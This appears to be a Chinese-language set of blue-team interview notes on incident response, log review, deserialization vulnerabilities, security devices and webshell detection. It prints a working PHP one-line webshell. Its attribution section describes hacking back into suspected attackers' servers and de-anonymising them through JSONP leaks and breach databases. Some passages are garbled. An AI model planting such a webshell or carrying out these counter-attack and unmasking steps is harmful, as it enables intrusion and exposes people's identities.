cron日志/var/log/cron
安全日志/var/log/secure
设备和网络控制
比如在涉密计算机上禁止访问外网，为了避免用户绕过策略可以禁止用户修改IP
删除默认路由配置，避免利用默认路由探测网络
禁止使用USB设备比如U盘
禁止ping命令，即禁用ICMP协议访问，不让外部ping通服务器

日志及木马被删除如何排查？

被攻击后，日志文件和木马文件被删除会给排查工作带来很大的困难，但还是有一些方法可以尝试：

查看系统备份：如果您的系统进行了定期备份，那么可以尝试从备份中恢复丢失的日志文件和木马文件。如果备份没有受到攻击，那么这种方式可能会非常有效。
恢复已删除文件：一些数据恢复软件，例如Recuva、EaseUS Data Recovery等，可以恢复已删除的文件。您可以尝试使用这些软件来恢复被删除的文件。
检查其他主机：如果您的系统被集成到网络中，可以检查其他主机是否有相同的攻击迹象和后门程序。对于攻击者来说，攻击多台主机通常需要更多的时间和资源，因此在其他主机上发现类似的攻击行为也许能够提供有用的信息。
分析系统快照：如果您的系统支持系统快照功能，例如 Windows 系统还原点，可以尝试回滚系统至之前的快照状态，并分析该状态下的日志信息和系统状态，以寻找攻击行为的证据。
日志审计：如果日志文件被删除，可以尝试通过其他渠道收集日志信息，并进行审计分析。例如，可以检查网络流量、系统性能、系统进程等信息，以确定是否存在异常行为。

总之，在日志文件和木马文件被删除的情况下，需要采用其他方法来寻找攻击迹象和证据。同时，为了避免这种情况的发生，我们应该在系统中设置必要的日志轮转和备份策略，并加强安全防御工作，避免被攻击者入侵。

安全设备告警？

安全设备报警是指安全设备（例如入侵检测系统、防火墙、安全加固等）监测到的与安全相关的事件或活动达到了预先设定的规则和阈值，触发了警报通知。以下是一些处理安全设备报警的方法：

确认警告的真实性：首先需要确认收到的警报信息是否为真实的安全事件，需要对日志和其他相关信息进行分析和验证。如果发现确实存在安全问题，则需要立即采取适当措施。
优先级分类：不同类型的安全事件具有不同的严重程度和威胁级别，需要根据事件的类型、来源等因素进行分类和优先级排序，并采取相应的措施进行处理。
制定处理计划：根据事件情况和优先级，制定相应的处理计划和操作流程。这些计划可以包括隔离受感染主机、采取补救措施、收集证据等方面。
跟踪事件进展：在处理安全事件时，需要跟踪事件的进展和结果，并及时更新相关记录和文档。同时要保持与相关人员的沟通和协调，以便及时解决问题。
定期复查：定期审查和分析系统和设备的报警记录和日志，以及采取的应对措施和效果。这可以帮助发现系统中存在的风险和漏洞，并及时加以修复和优化。

总之，在处理安全设备报警时，需要快速响应、分类优先、制定计划等步骤，以保障系统的安全性，并且需要持续地监测和优化安全防御策略。

Linux的入侵排查思路

1：账号安全
who 查看当前登录用户（tty本地登陆 pts远程登录） w 查看系统信息，想知道某一时刻用户的行为 uptime 查看登陆多久、多少用户，负载 1、用户信息文件/etc/passwd root❌0:0:root:/root:/bin/bash account:password:UID:GID:GECOS:directory:shell 用户名：密码：用户ID：组ID：用户说明：家目录：登陆之后shell 注意：无密码只允许本机登陆，远程不允许登陆
2、影子文件/etc/shadow

root: 6 6 6 oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1DpYxTCVvI/:16809:0:99999:7:::

用户名：加密密码：密码最后一次修改日期：两次密码的修改时间间隔：密码有效期：密码修改到期到的警告天数：密码过期之后的宽限天数：账号失效时间：保留 /etc/passwd 存储一般的用户信息，任何人都可以访问；/etc/shadow 存储用户的密码信息，只有 root 用户可以访问

2.历史命令

通过 .bash_history 查看帐号执行过的系统命令 1、root的历史命令 histroy 2、打开 /home 各帐号目录下的 .bash_history，查看普通帐号的历史命令历史操作命令的清除：history -c 但此命令并不会清除保存在文件中的记录，因此需要手动删除.bash_profile文件中的记录

3.检查异常端口 netstat -antlp|more 查看下pid所对应的进程文件路径，运行ls -l /proc/ P I D / e x e 或 f i l e / p r o c / PID/exe或file /proc/ P I D / e x e 或 f i l e / p roc / PID/exe（$PID 为对应的pid 号） 4.检查异常进程 ps aux | grep pid 5.检查开机自启动项开机启动配置文件 /etc/rc.local /etc/rc.d/rc[0~6].d

6.检查定时任务 crontab -l 列出某个用户cron服务的详细内容 Tips：默认编写的crontab文件会保存在 (/var/spool/cron/用户名例如: /var/spool/cron/root crontab -r 删除每个用户cront任务(谨慎：删除所有的计划任务) crontab -e 使用编辑器编辑当前的crontab文件如： */1 \* * * * echo “hello world” >> /tmp/test.txt 每分钟写入文件*2、利用anacron实现异步定时任务调度重点关注/var/spool/cron//etc/crontab /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/ /etc/anacrontab /var/spool/anacron/*

7.检查服务 chkconfig --list 命令，可以查看系统运行的服务 8.检查异常文件 9.检查系统日志

Linux应急措施

Linux被入侵症状

Linux常用排查命令

系统信息

查看当前系统状态 top 操作系统信息 uname -a 查看当前系统进程信息 ps 查看历史命令 history 列出本机所有的连接和监听的端口 netstat 查看谁在使用某个端口 lsof

用户登录

查看当前用户登录系统情况 who 分析超级权限账户 awk-F： ‘{if（$3==0）print $1}’/etc/passwd 查看可登录的账户 cat/etc/passwd|grep ‘/bin/bash’ 查看用户错误的登录信息 lastb 查看所有用户最后的登录信息 lastlog 查看用户最近登录信息 last /var/log/ 其中，/var/log/wtmp 存储登录成功的信息、btmp存储登录失败的信息、 utmp存储当前正在登录的信息 查看空口令账户 awk-F： ‘length（$2）==0 {print $1}’/etc/shadow

Linux基线规范

8、禁止 Control-Alt-Delete 键盘关闭命令

十五、溯源篇

溯源反制的思路？

1.攻击源捕获

安全设备报警，如扫描IP、威胁阻断、病毒木马、入侵事件等日志与流量分析，异常的通讯流量、攻击源与攻击目标等服务器资源异常，异常的文件、账号、进程、端口，启动项、计划任务和服务等邮件钓鱼，获取恶意文件样本、钓鱼网站 URL 等蜜罐系统，获取攻击者 ID、电脑信息、浏览器指纹、行为、意图的相关信息 2.溯源反制

IP 定位技术根据IP定位物理地址–代理 IP 溯源案例：通过 IP 端口扫描，反向渗透服务器进行分析，最终定位到攻击者相关信息 ID 追踪术 ID 追踪术，搜索引擎、社交平台、技术论坛、社工库匹配溯源案例：利用 ID 从技术论坛追溯邮箱，继续通过邮箱反追踪真实姓名，通过姓名找到相关简历信息网站 url 域名 Whois 查询–注册人姓名、地址、电话和邮箱 --域名隐私保护溯源案例：通过攻击 IP 历史解析记录/域名，对域名注册信息进行溯源分析恶意样本分析提取样本特征、用户名、ID、邮箱、C2 服务器等信息–同源分析溯源案例：样本分析过程中，发现攻击者的个人 ID 和 QQ，成功定位到攻击者社交账号基于 JSONP 跨域，获取攻击者的主机信息、浏览器信息、真实 IP 及社交信息等利用条件：可以找到相关社交网站的 jsonp 接口泄露敏感信息，相关网站登录未注销 3.攻击者画像

攻击路径攻击目的：拿到权限、窃取数据、获取利益、DDOS 等网络代理：代理 IP、跳板机、C2 服务器等攻击手法：鱼叉式邮件钓鱼、Web渗透、水坑攻击、近源渗透、社会工程等

攻击者身份画像虚拟身份：ID、昵称、网名真实身份：姓名、物理位置联系方式：手机号、qq/微信、邮箱组织情况：单位名称、职位信息

蓝队常用的反制方法有哪些？

a.蜜罐

b.对攻击目标进行反渗透（IP定位、IP端口扫描、Web站点渗透）

c.应用漏洞挖掘&利用（菜刀、Goby、Xray、蚁剑）

d.id->社交特征关联

e.钓鱼网站->后台扫描、XSS盲打

f.木马文件->同源样本关联->敏感字符串特征检测

如何防御钓鱼邮件？

钓鱼邮件是一种常见的网络针对性攻击手段，通常通过电子邮件发送虚假信息诱骗受害者提供个人敏感信息或进行非法行为。以下是几种发现和防御钓鱼邮件的方法：

查看发件人地址：钓鱼邮件的发件人地址通常会伪装成合法、可信的机构或公司，但是如果您仔细查看发件人地址，就可能发现其不是该机构或公司真正的域名。
检查链接地址：钓鱼邮件中通常会包含可疑的链接，如果您将鼠标悬停在链接上，就可以看到链接的真实地址。如果该地址与邮件内容不符，就可能是钓鱼邮件。
注意邮件内容：钓鱼邮件通常会给人留下一种紧急、必须立即采取行动的感觉，从而诱骗用户点击链接或执行某些操作。因此，如果您收到这样的邮件，请仔细阅读邮件内容，并多加思考和确认。
尽量避免下载附件：钓鱼邮件通常会携带恶意附件，如果您无法确认邮件的真实性，最好不要下载或打开这些附件，以免被感染。
安装反钓鱼软件：有一些反钓鱼软件可以帮助用户检测和拦截钓鱼邮件，例如 Google 的Password Alert 等。

总之，发现钓鱼邮件需要多加警惕和注意，在收到可疑邮件时，应该仔细查看邮件内容和相关信息，并尽可能采取措施避免被钓鱼攻击。

钓鱼邮件处置

屏蔽办公区域对钓鱼邮件内容涉及站点、URL 访问

根据办公环境实际情况可以在上网行为管理、路由器、交换机上进行屏蔽

邮件内容涉及域名、IP 均都应该进行屏蔽

对访问钓鱼网站的内网 IP 进行记录，以便后续排查溯源可能的后果

此处除了需要排查有多少人接收到钓鱼邮件之外，还需要排查是否公司通讯录泄露。采用 TOP500 姓氏撞库发送钓鱼邮件的攻击方式相对后续防护较为简单。如果发现是使用公司通讯录顺序则需要根据通讯录的离职情况及新加入员工排查通讯录泄露时间。毕竟有针对性的社工库攻击威力要比 TOP100、TOP500 大很多

如何发现钓鱼邮件？

发现途径如下：

邮件系统异常登录告警、员工上报、异常行为告警、邮件蜜饵告警

十六、其他

正向代理和反向代理的区别

正向代理即是客户端代理, 代理客户端, 服务端不知道实际发起请求的客户端

反向代理即是服务端代理, 代理服务端, 客户端不知道实际提供服务的服务端

正向shell和反向shell的区别

正向Shell：攻击者连接被攻击者机器，可用于攻击者处于内网，被攻击者处于公网的情况。

反向Shell：被攻击者主动连接攻击者，可用于攻击者处于外网，被攻击者处于内网的情况。

讲一讲java反序列化的原理？

Java反序列化漏洞是指恶意用户通过发送精心构造的序列化数据并触发其反序列化过程，从而执行未经授权的代码或操作。攻击者可以利用此漏洞来执行远程命令、绕过应用程序的安全检查、窃取敏感信息等攻击。如果Java应用对用户输入（即不可信数据）做了反序列化处理，那么攻击者可以通过构造恶意输入，让反序列化产生非预期的类或对象，这个类或对象在产生过程中就有可能带来任意代码执行。

shiro反序列化原理？

Shiro是Apache下的一个开源Java安全框架，执行身份认证，授权，密码和会话管理。shiro在用户登录时除了账号密码外还提供了可传递选项remember me。用户在登录时如果勾选了remember me选项，那么在下一次登录时浏览器会携带cookie中的remember me字段发起请求，就不需要重新输入用户名和密码。

fastjson反序列化原理？

fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能，在请求过程中，我们可以在请求包中通过修改@type的值，来反序列化为指定的类型，而fastjson在反序列化过程中会设置和获取类中的属性，如果类中存在恶意方法，就会导致代码执行等这类问题。

序列化和反序列化的概念？

序列化：把对象转化为可传输的字节序列过程称为序列化。

反序列化：把字节序列还原为对象的过程称为反序列化。

简单讲一下反序列化漏洞？

序列化是指程序将对象转化为字节序列从而便于存储运输的一种方式，反序列化则与其相反，即将字节序列转化为对象供程序使用。程序在进行反序列化时会调用一些函数，比如常见的PHP 反序列化函数 unserialize()以及一些常见的魔术方法，比如构造函数*construct()，析构函数destruct() ，*wakeup()，toString(0) ，sleep0等等。如果这些函数在传递参数时没有进行严格的过滤措施，那么攻击者就可以构造恶意代码并将其序列化后传入函数中，从而导致反序列化漏洞

F5 LTM解码法

当服务器使用F5 LTM做负载均衡时，通过对set-cookie关键字的解码真实ip也可被获取，例如：Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000，先把第一小节的十进制数即487098378取出来，然后将其转为十六进制数1d08880a，接着从后至前，以此取四位数出来，也就是0a.88.08.1d，最后依次把他们转为十进制数10.136.8.29，也就是最后的ip。

未授权访问漏洞

未授权访问是系统对用户限制不全，或者无限制，可以让任意用户或者限制访问用户，访问到需要权限认证的地址。未授权访问通常是会泄露用户信息，系统信息。某些服务和系统中，未授权访问还可以执行系统命令，操作系统文件，导致系统的整体安全遭到破坏。详细：链接: link

常见的未授权访问漏洞有哪些？

常见的逻辑漏洞有哪些？

代码执行、命令执行、文件读取的函数有哪些？

代码执行eval、call_user_func、call_user_func_array等
文件读取fopen()、readfile()、fread()、file()、show_source()等
命令执行system()、exec()、shell_exec()、passthru()、pcntl_exec()等

常见的中间件和对应漏洞有哪些？

•IIS：PUT漏洞、短文件名猜解、远程代码执行、解析漏洞

•Apache：解析漏洞、目录遍历

•Nginx：文件解析、目录遍历、CRLF注入、目录穿越

•Tomcat：远程代码执行、war后门文件部署

•JBoss：反序列化漏洞、war后门文件部署

•WebLogic：反序列化漏洞、SSRF任意文件上传、war后门文件部署

•ApacheShiro反序列化漏洞：ShirorememberMe（Shiro-550）、ShiroPaddingOracleAttack(Shiro-721)

fastjson漏洞利用原理？

在请求包里面中发送恶意的 json 格式 payload，漏洞在处理 json 对象的时候，没有对@type 字段进行过滤，从而导致攻击者可以传入恶意的 TemplatesImpl 类，而这个类有一个字段就是_bytecodes，有部分函数会根据这个_bytecodes 生成 java 实例，这就达到 fastjson 通过字段传入一个类，再通过这个类被生成时执行构造函数。

shiro漏洞

hiro是Java平台上一个流行的安全框架，用于身份验证、授权和会话管理等功能。然而，Shiro也存在一些安全漏洞，攻击者可以利用这些漏洞来绕过身份验证、执行未授权操作或者获取敏感信息。以下是一些已知的Shiro漏洞：

CVE-2020-13933：该漏洞允许攻击者通过构造特定的请求来绕过Shiro的身份验证和授权机制，从而执行未授权操作。攻击者可以利用这个漏洞来获取敏感信息或者执行恶意操作。
CVE-2020-17523：这个漏洞存在于Shiro的RememberMe功能中，攻击者可以通过发送特制的RememberMe Cookie来绕过身份验证，从而获取未授权访问。
CVE-2020-11989：该漏洞涉及Shiro的默认配置，在某些情况下，攻击者可以利用该漏洞来绕过身份验证和授权机制。

这些漏洞都已经得到修复，建议使用Shiro的用户及时升级到最新版本，以修复这些安全漏洞。同时，还应该遵循以下最佳实践来加强Shiro的安全性：

及时更新Shiro版本：保持Shiro库的最新版本，以获得已知漏洞的修复和安全增强。
配置安全的RememberMe功能：如果使用Shiro的RememberMe功能，请确保使用安全的密钥和加密机制，以防止RememberMe Cookie被篡改或伪造。
妥善配置身份验证和授权：确保正确配置Shiro的身份验证和授权机制，并限制用户的访问权限，避免未授权访问。
加强输入验证和过滤：对于用户输入的数据，进行严格的验证和过滤，以防止攻击者构造恶意输入进行攻击。
定期审计和监控：监控Shiro的日志和用户活动，并进行定期审计，以检测潜在的安全问题和异常行为。

总之，使用Shiro时，要保持关注安全漏洞的公告和修复，并采取适当的措施来加强Shiro的安全性，以确保应用程序的安全性和保护用户的敏感信息。

如何发现shiro漏洞？

登陆失败时候会返回 rememberMe=deleteMe 字段或者使用 shiroScan 被动扫描去发现

哪些漏洞会被高频利用于打点？

a.ApacheShiro相关漏洞
b.Fastjson漏洞
c.Log4j
d.上传漏洞
e.边界网络设备资产+弱口令

CVE-2020-11989：该漏洞存在于 Apache Shiro 的默认配置中，攻击者可以利用该漏洞来绕过身份验证和授权机制，从而获得未授权访问权限。

CVE-2016-4437：此漏洞允许攻击者通过发送恶意序列化对象利用 Apache Shiro 的 RememberMe 功能，以执行远程代码执行攻击。

CVE-2014-0075：这个漏洞影响 Apache Shiro 在与 Spring Framework 集成时的安全性，攻击者可以利用该漏洞绕过授权限制。

这些漏洞在发现后都得到了修复。如果您使用 Apache Shiro，请确保升级到最新版本以修复这些漏洞。此外，以下是一些建议来增强 Apache Shiro 的安全性：

及时更新 Apache Shiro：保持 Apache Shiro 库的最新版本，以获取已知漏洞的修复和安全增强。

定期审计和监控：监控 Apache Shiro 的日志和用户活动，并进行定期审计，以检测潜在的安全问题和异常行为。

配置安全的 RememberMe 功能：如果使用 Apache Shiro 的 RememberMe 功能，请确保使用安全的密钥和加密机制，以防止 RememberMe Cookie 被篡改或伪造。

加强输入验证和过滤：对于用户输入的数据，进行严格的验证和过滤，以防止攻击者构造恶意输入进行攻击。

使用安全的序列化机制：如果您使用了 Shiro 的序列化功能，请确保使用安全的序列化机制，避免受到序列化漏洞的影响。

确保您遵循最佳实践并保持关注 Apache Shiro 的安全公告，以及及时更新和修复任何已知的漏洞，这样可以增强您应用程序的安全性。

Fastjson漏洞

原理

讲一讲log4j RCE?

Log4j 是Apache 的一个开源项目，是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到${后，以:号作为分割，将表达式内容分割成两部分，前面一部分prefix，后面部分作为key，然后通过prefix去找对应的lookup，通过对应的lookup实例调用lookup方法，最后将key作为参数带入执行，引发远程代码执行漏洞。

你在渗透测试中常用到的工具？

了解安全设备吗？

入侵防御系统IPS

是计算机网络安全设施，是对防病毒软件和防火墙的补充。入侵预防系统是一部能够监视网络或网络设备的网络数据传输行为的计算机网络安全设备，能够即时的中断、调整或隔离一些不正常或是具有伤害性的网络数据传输行为。

入侵检测系统IDS

积极主动的防护措施，按照一定的安全策略，通过软件，硬件对网络，系统的运行进行实时的监控，尽可能地发现网络攻击行为，积极主动的处理攻击，保证网络资源的机密性，完整性和可用性。

防火墙

防火墙是位于两个(或多个)网络间，实行网络间访问或控制的一组组件集合之硬件或软件。隔离网络，制定出不同区域之间的访问控制策略来控制不同信任程度区域间传送的数据流。

数据库审计系统

是对数据库访问行为进行监管的系统，通过镜像或者探针的方式采集所有数据库的访问流量，并基于SQL语法，语义的解析技术，记录下对数据库所有访问和操作行为，例如访问数据的用户IP，账号，时间等等，对数据进行操作的行为等等。

日志审计系统

日志审计系统能够通过主被动结合的手段，实时且不间断的采集用户网络中不同厂商的安全设备，网络设备，主机，操作系统以及各种应用系统产生的海量日志信息，并将这些信息汇集到审计中心，进行集中化存储，备份，查询，审计，告警，响应，并出具丰富的报表报告，获悉全网的整体安全运行态势，同时满足等保关于安全管理中心的日志保存时间大于6个月的要求。

堡垒机

是针对内部运维人员的运维安全审计系统。主要功能是对运维人员的运维操作进行审计和权限控制(比如要登录某些平台或者系统只能通过堡垒机才可以，不用堡垒机是无法访问的)。同时堡垒机还有账号集中管理，单点登录(在堡垒机上登录即可实现对多个其他平台的无密登录)等功能。

漏洞扫描系统

漏洞扫描工具或者设备是基于漏洞数据库，通过扫描等手段对指定的远程或本地计算机系统的安全脆弱性进行检测，发现可利用漏洞的一种安全检测系统(我们常用的针对WEB站点进行扫描的工具和此处漏洞扫描系统不是一个概念)。

数据安全态势感知平台

以大数据平台为基础，通过收集多元，异构的海量日志，利用关联分析，机器学习，威胁情报，可视化等技术，帮助用户持续监测网络安全态势，实现从被动防御向积极防御的进阶。

终端安全管理系统

是集防病毒，终端安全管控，终端准入，终端审计，外设管控，EDR等功能于一体，兼容不同操作系统和计算机平台，帮助客户实现平台一体化，功能一体化，数据一体化的终端安全立体防护。

WAF是以网站或应用系统为核心的安全产品，通过对HTTP或HTTPS的Web攻击行为进行分析并拦截，有效的降低网站安全风险。产品主要部署在网站服务器的前方。通过特征提取和分块检索技术进行模式匹配来达到过滤，分析，校验网络请求包的目的，在保证正常网络应用功能的同时，隔绝或者阻断无效或者非法的攻击请求。

蜜罐

蜜罐是一种安全威胁的主动防御技术，它通过模拟一个或多个易受攻击的主机或服务来吸引攻击者，捕获攻击流量与样本，发现网络威胁，提取威胁特征，蜜罐的价值在于被探测，攻陷。

使用过哪些安全设备？

了解过WAF吗？

绕过WAF的方法？

WAF的分类？如何拦截攻击？

WAF（Web 应用程序防火墙）产品通常可以分为以下几种分类：
基于签名的 WAF：基于签名的 WAF 通过检测请求中是否包含已知漏洞的特征，来拦截攻击。这种类型的 WAF 可以快速识别和阻止已知的攻击方式。
基于行为的 WAF：基于行为的 WAF 使用机器学习、人工智能等技术来分析请求的行为模式，并判断其是否具有攻击性。这种类型的 WAF 能够较好地识别未知攻击。
综合型 WAF：综合型 WAF 结合了基于签名和基于行为两种技术，能够同时检测已知攻击和未知攻击，提供更加全面的保护。
WAF 产品一般通过拦截攻击请求来保护 Web 应用程序。具体的拦截方式包括：
黑名单过滤：根据已知的攻击方式，设置黑名单规则，对符合规则的请求进行拦截。
白名单过滤：对请求进行白名单过滤，只允许符合规则的请求通过。
存储过程注入防护：对 SQL 注入进行防护。WAF 可以检测并拦截具有攻击意图的 SQL 语句，并对其进行相应的修复和防护。
跨站脚本（XSS）防护：WAF 可以检测并过滤包含恶意 JavaScript 代码的请求，并防止 XSS 攻击。
防止文件上传漏洞：WAF 可以检测并拦截包含恶意文件的请求，从而避免文件上传漏洞导致的攻击。

总之，WAF 产品可以有效地保护 Web 应用程序免受各种类型的攻击。但是需要注意的是，WAF 并不是万能的，仍然需要结合其他安全措施来保障 Web 应用程序的安全。

常用的webshell检测工具？

a.D盾
b.河马WEBSHELL
c.百度WEBDIR+
d.WebShellDetector
e.SangforWebShellKill[深信服]
f.PHPMalwareFinder[支持Linux]

网站被上传webshell如何处理？

1.首先关闭网站，下线服务。有必要的话将服务器断网隔离。
2.手工结合工具进行检测。
工具方面比如使用D盾webshellkill，河马webshell查杀，百度在线webshell查杀等工具对网站目录进行排查查杀，如果是在护网期间可以将样本备份再进行查杀。
手工方面对比未上传webshell前的备份文件，从文件甚至代码层面进行对比，检查有无后门程序或者其他异常文件，实在不行就直接用备份文件替换了。
3.加强安全策略，比如定期备份网站配置文件，及时安装服务器补丁，定期更新组件以及安全防护软件，定期修改密码等等措施。

有了解过态势感知产品吗？

360态势感知：由中国著名安全厂商360推出的产品，主要提供网络威胁查询、漏洞扫描、流量分析等功能，同时集成了各种安全情报和指标，可以为用户提供全面的安全态势分析和预警服务。
腾讯云安全大脑：由腾讯云推出的产品，利用AI、机器学习等技术对攻击进行实时监测和分析，提供包括漏洞扫描、风险评估、异常检测等一系列安全服务。
云锁事件响应中心：由阿里云推出的产品，提供网络空间威胁和安全事件的监测、预警、应急响应等服务。该产品采用 AI算法进行态势感知，并可以自动化响应安全事故。
北京赛迪态势感知系统：由北京赛迪安全科技股份有限公司开发的产品，支持网络威胁情报搜集、风险事件自动识别、威胁行为关联分析等功能，可为企业提供全生命周期的网络安全保护。
启明星辰安全态势感知：由启明星辰推出的产品，提供整体安全态势感知、针对性攻击检测、应急响应等功能，可帮助用户实现从被动防御到主动防御的转变。

这些产品都采用了先进的机器学习和人工智能技术，可以自动化地分析和识别网络威胁，并及时发出预警或者采取应急措施。同时，这些产品还具备可视化的操作界面，用户可以通过简单的操作就可以了解整个系统的安全情况，并做出相应的决策

讲一讲sqlmap中的risk和level的区别？

risk风险等级越大则测试的语句越多强调数量
level探测的深度越大则测试的范围越广例如cookie host 等等都会测试强调范围

如何处理.exe文件？

首先看它的来源和去向，然后可以下载但不运行，放入微步沙箱中，看是否有后门，若有后门，就用 IDA 反汇编得到恶意攻击者的有用信息，再进一步描绘出攻击者画像进行溯源 .exe 文件是 Windows 上的可执行文件，通常包含应用程序或者安装程序等内容。如果您在电子邮件或者网络上收到了 .exe 文件，需要格外小心，因为它们可能包含病毒、恶意软件或者其他危险物品。以下是几种处理方法：

不要直接运行：不要轻易双击或者打开未知来源的 .exe 文件，因为它们可能会启动恶意软件，并对您的系统造成损害。如果您必须要运行这些.exe 文件，请先进行杀毒软件扫描和检测操作。
使用虚拟机：如果您需要测试某个 .exe文件的行为和效果，可以考虑使用虚拟机。虚拟机可以将一个完整的操作系统运行在一个软件容器中，使得用户可以在其中安全地运行可疑的 .exe文件，并且不会影响主机系统的安全性。
上传到在线扫描服务平台：一些在线杀毒软件平台，例如 VirusTotal 等，提供了在线扫描可疑文件的服务。如果您不确定一个 .exe文件是否安全，可以上传到这些平台进行扫描，以获取更多的信息和建议。
将文件发送给安全专家：如果您无法确定.exe文件的安全性，可以将其发送给安全专家进行分析。安全专家可以根据其行为特征和结构等信息，对该文件进行深度分析，以确定是否存在潜在的安全威胁。总之，在处理未知来源的 .exe 文件时，需要注意谨慎并采取必要的安全措施，以确保您的系统不会被攻击或感染。如果您遇到可疑的 .exe 文件，请务必进行杀毒软件扫描，并尽可能获取更多的信息和建议。

怎么确定一个网站是不是站库分离

（1）查询web服务器名
LENOVO-GH*****—select @@servername;
（2）查询数据库服务器名
DESKTOP-1HV—select host_name();

对比两个查询结果，即可判断。相同则同站同库，不同就是站库分离

知道那些防火墙设备

常见的 HW 设备有：公安部网防G01、K01、360网康/网神防火墙、微步威胁情报、安恒云-Web应用防火墙（玄武盾）、默安蜜罐、知道创宇蜜罐、山石防火墙 NGAF/NGFW：下一代 Web 应用防火墙（Next Generation Application Firewall，通防火墙和下一代防火墙的区别），聚合了以下功能

IDS HIDS：基于主机的入侵检测系统 NIDS：基于网络的入侵检测系统 HIDS+NIDS：基于混合数据源的入侵检测系统 IPS：入侵防御系统 AV：反病毒系统 EDR：主机安全管理\终端检测和响应

EDR 实时监测终端上发生的各类行为，采集终端运行状态，在后端通过大数据安全分析、机器学习、沙箱分析、行为分析、机器学习等技术，提供深度持续监控、威胁检测、高级威胁分析、调查取证、事件响应处置、追踪溯源等功能，可第一时间检测并发现恶意活动，包括已知和未知威胁，并快速智能地做出响应，全面赋予终端主动、积极的安全防御能力

简单来说就是给内网环境中所有主机安装管理软件终端，可以在管理平台集中管理和数据分析过滤，基本所有安全厂商都有自己的 EDR 产品

这个算是让整套系统性能得到提升的灵魂了，定位为客户的安全大脑，是一个集检测、可视、响应处置于一体的大数据安全分析平台。产品以大数据分析为核心，支持主流的安全设备、网络设备、操作系统等多源数据接入，利用大数据、关联分析、告警降噪等技术，实现海量数据的统一挖掘分析

防火墙报警如何确定是不是误判

一般情况下，真实攻击不可能只持续一次，它一定是长时间、周期性、多 IP 的进行攻击

比如数据包或者日志，你的分析思路是什么，以及你会用到哪些工具或者那些网站进行查询？

用流量监测的安全设备，比如天眼，查看报文，分析报文里和 host 和网站目录路径，查看是否可疑，使用微步查询 host 是否为恶意，使用 wireshark 对数据包深度分析

看一下请求的网站路径，源 IP 与目的 IP 地址，host 字段的值以及发包内容等

工具有 wireshark，网站的话微步在线等威胁情报中心

文件上传和命令执行，有看过相关日志吗

文件：可能在系统有上传功能或者有文本编辑器，看一下是否有 base64 加密或者 url 加密，解码验证一下是否有恶意代码

系统日志：有没有 web 容器做了一些危险行为，比如 bash 反弹 shell 等

网络应用日志：有没有异常的网站文件，类似 webshell 等，就有可能是命令执行

windows日志分析工具

Event Log Explorer

webshell分析思路

1.基于webshell特征检测常见webshell函数

（1）存在系统调用的命令执行函数，如eval、system、cmd_shell、assert等；

（2）存在系统调用的文件操作函数，如fopen、fwrite、readdir等；

（3）存在数据库操作函数，调用系统自身的存储过程来连接数据库操作；

（4）具备很深的自身隐藏性、可伪装性，可长期潜伏到web源码中；

（5）衍生变种多，可通过自定义加解密函数、利用xor、字符串反转、压缩、截断重组等方法来绕过检测；

基于webshell工具特征的检测

webshell的访问特征

1）少量的IP对其发起访问

2）总的访问次数少

3）该页面属于孤立页面

给你一个比较大的日志，应该如何分析

攻击规则匹配，通过正则匹配日志中的攻击请求
统计方法，统计请求出现次数，次数少于同类请求平均次数则为异常请求
白名单模式，为正常请求建立白名单，不在名单范围内则为异常请求
HMM 模型，类似于白名单，不同点在于可对正常请求自动化建立模型，从而通过正常模型找出不匹配者则为异常请求
借助日志分析工具，如 LogForensics 腾讯实验室

设备出现了误报如何处置（日志）

先去查看设备的完整流量日志等信息。在护网过程中如果确实存在异常流量应当及时进行上报，确认是误报后做好事件记录

十七、nmap 扫描基础命令

sT TCP (全)连接扫描，准确但留下大量日志记录 -sS TCP SYN (半)扫描，速度较快，不会留下日志 -sN null 扫描，标志位全为 0，不适用 Windows -sF FIN 扫描，标志位 FIN=1，不适用 Windows -O 查看目标主机系统版本 -sV 探测服务版本 -A 全面扫描

你还用过其他态势感知的产品吗？

ips，ids，hids，堡垒机等

命令行工具用的什么比较多

xshell、xftp、finalshell

你用过微步吗？

微步在线是一个威胁情报中心，可以通过 ip 或域名查询其是不是恶意的，对于判断恶意链接具有一定的参考性，他还有一个插件可以在页面选中就能进行查询，还是一个比较好用的工具

横向越权漏洞的修复

横向越权：横向越权指的是攻击者尝试访问与他拥有相同权限的用户的资源

纵向越权：纵向越权指的是一个低级别攻击者尝试访问高级别用户的资源

对于纵向越权，我们可以通过设置用户角色，为不同的角色提供不同的权限来避免

为了防止横向越权，我们可以使用缓存来进行辅助，当登录成功或者进行操作时，我们在缓存中存储一对由用户名和一个唯一的数字组成的数据（token），然后返回放入的唯一数据在重置密码时我们的参数不仅需要用户名和密码还需要前面生成的唯一数字，根据用户名在缓存中取出对应的数字，如果取出的数字和参数中传入的想等，则证明重置的当前用户的密码，否则不是，且不予以重置

如何反爬

后台对访问进行统计，如果单个 IP 访问超过阈值，予以封锁
后台对访问进行统计，如果单个 session 访问超过阈值，予以封锁
后台对访问进行统计，如果单个 userAgent 访问超过阈值，予以封锁

网页状态码

403 （禁止）服务器拒绝请求。 404 （未找到）服务器找不到请求的网页。 301 （永久移动）请求的网页已永久移动到新位置。服务器返回此响应（对 GET 或 HEAD 请求的响应）时，会自动将请求者转到新位置。 302 （临时移动）服务器目前从不同位置的网页响应请求，但请求者应继续使用原有位置来进行以后的请求。 500 （服务器内部错误）服务器遇到错误，无法完成请求。 501 （尚未实施）服务器不具备完成请求的功能。例如，服务器无法识别请求方法时可能会返回此代码。 502 （错误网关）服务器作为网关或代理，从上游服务器收到无效响应。 503 （服务不可用）服务器目前无法使用（由于超载或停机维护）。通常，这只是暂时状态。 504 （网关超时）服务器作为网关或代理，但是没有及时从上游服务器收到请求。 505 （HTTP 版本不受支持）服务器不支持请求中所用的 HTTP 协议版本。

PHP一句话木马

<?php @eval($\\\_POST\['shy'\]);?>

常见OA系统？

PHP：通达OA、泛微 Eoffice
Java：泛微OA/云桥、致远OA、蓝凌OA、用友OA
ASP：启莱OA

Powershell了解过吗？

简介

